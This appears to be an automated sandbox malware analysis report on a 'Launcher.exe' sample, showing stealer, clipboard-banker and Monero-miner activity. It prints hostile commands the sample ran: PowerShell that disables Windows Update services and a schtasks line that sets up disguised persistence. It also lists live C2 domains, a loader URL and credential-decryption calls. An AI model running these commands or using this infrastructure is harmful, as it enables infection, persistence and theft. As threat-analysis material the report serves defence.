                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7556, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", ProcessId: 5428, ProcessName: powershell.exe
                      Sigma detected: Stop Windows Service Via PowerShell Stop-Service
                      Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 5540, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7852, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Schedule system process
                      Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 2968, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-13T10:18:01.336176+010020283713Unknown Traffic192.168.2.449726149.154.167.99443TCP
                      2025-03-13T10:18:03.512943+010020283713Unknown Traffic192.168.2.449727104.21.32.1443TCP
                      2025-03-13T10:18:05.152034+010020283713Unknown Traffic192.168.2.449729104.21.32.1443TCP
                      2025-03-13T10:18:08.656005+010020283713Unknown Traffic192.168.2.449730104.21.32.1443TCP
                      2025-03-13T10:18:11.500651+010020283713Unknown Traffic192.168.2.449732104.21.32.1443TCP
                      2025-03-13T10:18:14.561650+010020283713Unknown Traffic192.168.2.449733104.21.32.1443TCP
                      2025-03-13T10:18:23.986509+010020283713Unknown Traffic192.168.2.449735104.21.32.1443TCP
                      2025-03-13T10:18:30.831166+010020283713Unknown Traffic192.168.2.449736104.21.32.1443TCP
                      2025-03-13T10:18:36.848098+010020283713Unknown Traffic192.168.2.449737104.21.32.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-13T10:18:52.869589+010028032702Potentially Bad Traffic192.168.2.449740147.45.124.24180TCP
                      2025-03-13T10:18:57.326305+010028032702Potentially Bad Traffic192.168.2.449740147.45.124.24180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-13T10:18:52.869589+010028290562Crypto Currency Mining Activity Detected192.168.2.449740147.45.124.24180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-13T10:18:49.797762+010028548021Domain Observed Used for C2 Detected185.236.26.1115968192.168.2.449739TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://138.124.55.36/loader/1/file3.exeAvira URL Cloud: Label: malware
                      Source: menuedgarli.shop/AUIqnAvira URL Cloud: Label: malware
                      Source: https://menuedgarli.shop/AUIqnAvira URL Cloud: Label: malware
                      Source: https://menuedgarli.shop/Avira URL Cloud: Label: malware
                      Source: https://menuedgarli.shop/AUIqnlAvira URL Cloud: Label: malware
                      Source: https://menuedgarli.shop/AUIqnqAvira URL Cloud: Label: malware
                      Source: https://menuedgarli.shop/eE4Avira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeAvira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeAvira: detection malicious, Label: TR/Crypt.Agent.ivuts
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeAvira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Found malware configuration
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\WinUpdate32\RuntimeBroker.exeReversingLabs: Detection: 25%
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeReversingLabs: Detection: 25%
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeReversingLabs: Detection: 45%
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeReversingLabs: Detection: 45%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                      Sample uses string decryption to hide its real strings
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: menuedgarli.shop/AUIqn
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                      Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData,29_2_0041BAC1

                      Bitcoin Miner

                      barindex
                      Yara detected Xmrig cryptocurrency miner
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000002.2492130397.00000021331BA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000041.00000002.2494603191.0000024811FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000002.2496546660.000001FE48C10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000002.2496546660.000001FE48C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000002.2496546660.000001FE48C1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000040.00000002.2496546660.000001FE48CFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RtkAudUService64a.exe PID: 4132, type: MEMORYSTR
                      DNS related to crypt mining pools
                      Source: unknownDNS query: name: xmr-eu1.nanopool.org
                      Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1238969388.000000000334D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021FCDE FindFirstFileExW,28_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0021FD8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0021FCDE FindFirstFileExW,29_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0021FD8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]29_2_00442800
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh]29_2_0040D830
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-30h]29_2_004490C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edi, byte ptr [ebx+ecx]29_2_0044816C
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov dword ptr [esp], eax29_2_00410993
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h]29_2_0041BAC1
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch]29_2_0041BAC1
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp+02h]29_2_00429460
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov word ptr [ecx], dx29_2_00448CC3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then lea edi, dword ptr [eax-0000008Ah]29_2_0044BCE0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h29_2_0044AE40
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then push edi29_2_00411E2A
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah]29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch]29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h29_2_00420EA0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]29_2_0042F760
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]29_2_0042F760
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then lea ebp, dword ptr [edx+ecx]29_2_0042F760
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then inc ebx29_2_00401040
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov dword ptr [esp], edx29_2_0044B840
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah]29_2_00431850
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov eax, ebx29_2_00424030
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov word ptr [eax], dx29_2_004208F5
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then jmp dword ptr [00451774h]29_2_0041F888
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov word ptr [eax], dx29_2_00420091
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h]29_2_004288A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h29_2_004288A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov word ptr [eax], cx29_2_004288A0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov byte ptr [ecx], al29_2_0041312E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov word ptr [ecx], si29_2_004201C3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]29_2_0040A1E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]29_2_0040A1E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]29_2_0040B240
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h]29_2_004112E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h29_2_0042031B
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh]29_2_0040D3D0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov dword ptr [esi+04h], edx29_2_004113E2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then push edi29_2_004313F7
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah]29_2_0042FB80
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]29_2_0041AC10
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh29_2_0041ACD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh29_2_0041ACD0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh]29_2_0040C4E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then and esi, 80000000h29_2_0040BC80
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then push ebx29_2_0041FC88
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+10h]29_2_0040FCB0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov dword ptr [esp+18h], ecx29_2_0041D4B8
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]29_2_00444542
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ebx, byte ptr [edx]29_2_0043FD70
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]29_2_00446D30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]29_2_00446D30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]29_2_00446D30
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h]29_2_0042FDCC
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h]29_2_004485D1
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]29_2_0042ED90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]29_2_0042ED90
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h]29_2_0041E5BB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov byte ptr [edx], al29_2_00423612
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]29_2_004336C0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h]29_2_004236E0
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h]29_2_004326FC
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then mov byte ptr [ecx], al29_2_00437682
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h]29_2_00432E9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then push edi29_2_00431775
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx esi, byte ptr [edx]29_2_00431FCA
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]29_2_00402780
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+24h]29_2_0041EF9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]29_2_0043F7B0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.236.26.111:5968 -> 192.168.2.4:49739
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.236.26.111 5968
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: menuedgarli.shop/AUIqn
                      Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
                      Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
                      Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
                      Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
                      Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
                      Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
                      Source: Malware configuration extractorURLs: bugildbett.top/bAuz
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49718
                      Source: global trafficTCP traffic: 192.168.2.4:49718 -> 185.170.153.104:3000
                      Source: global trafficTCP traffic: 192.168.2.4:49719 -> 5.252.153.122:3000
                      Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.236.26.111:5968
                      Source: global trafficTCP traffic: 192.168.2.4:49742 -> 51.15.58.224:10343
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:17:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 11:54:14 GMTETag: "14c200-63023dd3da07b"Accept-Ranges: bytesContent-Length: 1360384Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 b6 9b d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 9c 08 00 00 fe 00 00 00 00 00 00 82 e6 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 14 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 09 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 09 00 40 45 00 00 00 a0 09 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 fb 08 00 18 00 00 00 98 bf 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 37 09 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 9a 08 00 00 10 00 00 00 9c 08 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 a0 00 00 00 b0 08 00 00 a2 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 60 09 00 00 16 00 00 